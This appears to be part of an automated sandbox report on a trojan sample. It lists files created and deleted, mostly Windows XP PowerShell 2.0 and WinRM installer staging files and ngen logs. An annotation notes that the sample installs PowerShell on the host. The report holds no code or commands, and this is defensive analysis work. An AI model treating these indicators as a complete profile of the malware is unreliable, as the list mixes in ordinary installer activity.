C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (0 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (0 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (0 bytes)
C:\ea4acb66495575d6b9f323 (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (0 bytes)

The process ngen.exe:3596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:3168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)

The process ngen.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (782 bytes)

The process ngen.exe:2988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)

The process ngen.exe:3172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)

The process ngen.exe:1960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)

The process ngen.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)

The process ngen.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1112 bytes)

The process ngen.exe:916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:3936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)

The process ngen.exe:2952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)

The process ngen.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:1724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:3220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:2164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)

The process ngen.exe:648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (458 bytes)

The process update.exe:4040 makes changes in the file system. This is the Windows update installer launched by WindowsXP-KB968930-x86-ENG.exe (KB968930 is the Windows Management Framework Core package: Windows PowerShell 2.0 and WinRM 2.0), so the activity listed below is the package's own setup output rather than files authored by the sample. The SET*.tmp entries are setupapi staging copies that are renamed into place and then removed (they reappear with 0 bytes in the delete list), and the WindowsPowerShell\v1.0, winrm and Wsm* files are the package payload. The point of interest for triage is that the sample fetches and installs PowerShell on a Windows XP host that did not have it.
The Trojan creates and/or writes to the following file(s):

%System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
%System%\SET12.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
%System%\SET1B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
%WinDir%\inf\SET1D.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
%System%\SET1A.tmp (789 bytes)
%WinDir%\Help\SETCA.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
%WinDir%\SECD5.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
%System%\winrm\0409\SET22.tmp (601 bytes)
%System%\SET36.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
%System%\SET25.tmp (2 bytes)
%System%\SET13.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
%System%\SET14.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
%WinDir%\inf\SET1E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
%System%\SET2A.tmp (1281 bytes)
%System%\SETC4.tmp (42 bytes)
%System%\SET19.tmp (25 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\SET2D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
%System%\SET33.tmp (25 bytes)
%WinDir%\msmqinst.log (5398 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
%System%\SETB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
%System%\SET2B.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
%System%\SET2E.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
%System%\SETE.tmp (673 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
%System%\wbem\SET23.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\SET17.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\SET34.tmp (789 bytes)
%System%\SET18.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
%System%\SET27.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
%System%\SET11.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
%System%\SET35.tmp (14 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\SET10.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
%System%\SET26.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
%System%\config\system (3251 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
%System%\SET32.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\wbem\SET9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
%System%\SET16.tmp (12 bytes)
%System%\winrm\0409\SET3C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (49682 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
%System%\SET28.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
%System%\SET31.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
%System%\SET29.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
%System%\SET2C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
%WinDir%\KB968930.log (245066 bytes)
%System%\SET15.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\SET24.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
%System%\SET1C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
%System%\SETD.tmp (1281 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\SETC.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
%WinDir%\inf\SET37.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
%WinDir%\inf\SET38.tmp (12 bytes)
%System%\SET2F.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
%System%\SET30.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)

The Trojan deletes the following file(s):

%System%\GroupPolicy\Adm\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%WinDir%\inf\SET1D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\SET1A.tmp (0 bytes)
%WinDir%\Help\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (0 bytes)
%WinDir%\SECD5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\winrm\0409\SET22.tmp (0 bytes)
%System%\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\SETC4.tmp (0 bytes)
%System%\SET19.tmp (0 bytes)
%System%\SET1B.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\wbem\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\SET34.tmp (0 bytes)
%System%\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (0 bytes)
%WinDir%\Temp\UPD8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET35.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\SET32.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
